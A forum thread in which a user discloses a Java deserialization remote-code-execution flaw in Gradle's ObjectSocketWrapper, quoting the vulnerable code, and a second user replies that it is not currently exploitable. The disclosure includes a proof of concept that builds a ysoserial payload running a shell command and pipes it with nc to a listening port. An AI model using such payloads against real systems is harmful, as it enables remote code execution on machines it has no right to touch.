A security issue about gradle RCE

rootredrain · May 23, 2016, 8:22pm

I can’t find the security issue report mail…the info@gradle.org didn’t answer me＝。＝
if you have any problem about this issue plz connect me rootredrain@gmail.com

Hi：
I found a vulnerabililty in gradle. This project use
ObjectSocketWrapper class to deserialize data, this class is used in
the jetty subproject and ui subproject,however this class has a object
readObject(), it achieved through the new ObjectInputStream ,

github.com

gradle/gradle/blob/f490bdf61bd9b4f5383cd9fb0d8ffbca93da8c32/subprojects/ui/src/main/java/org/gradle/foundation/ipc/basic/ObjectSocketWrapper.java#L51


    } catch (SocketException e) {
        logger.error("Failed to set timeout", e);
    }
}


public Object readObject() {


    ObjectInputStream reader = null;


    try {
        reader = new ObjectInputStream(socket.getInputStream());
    } catch (SocketException e) {
        if (!isIgnorableException(e)) {
            logger.error("Reading Object", e);
        }
        return null;
    } catch (Exception e) {
        logger.error("Reading Object", e);
        return null;
    }

this method flow from the serialization vulnerability.

PoC:

we can use the ysoserial project to create payload easily, gradle will
open a socket and wait for a client to send serialized data

java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsBeanutils1 “touch
/tmp/rr” > /tmp/payload
cat /tmp/payload |nc 127.0.0.1 [port]

Regards,
redrain

philwantsfish · May 24, 2016, 7:27pm

I was coming to report this issue, but it looks like someone read my blogpost and reported it already ( http://philwantsfish.github.io/security/java-deserialization-github )

Neither of the subprojects are vulnerable at the moment so fixing these is not urgent. Exploiting this vulnerability will require finding a new gadget chain. Particularly you will want to be careful about what new dependencies you add to the projects until the issue is fixed. For advice or help you can reach me at okeefephil@gmail.com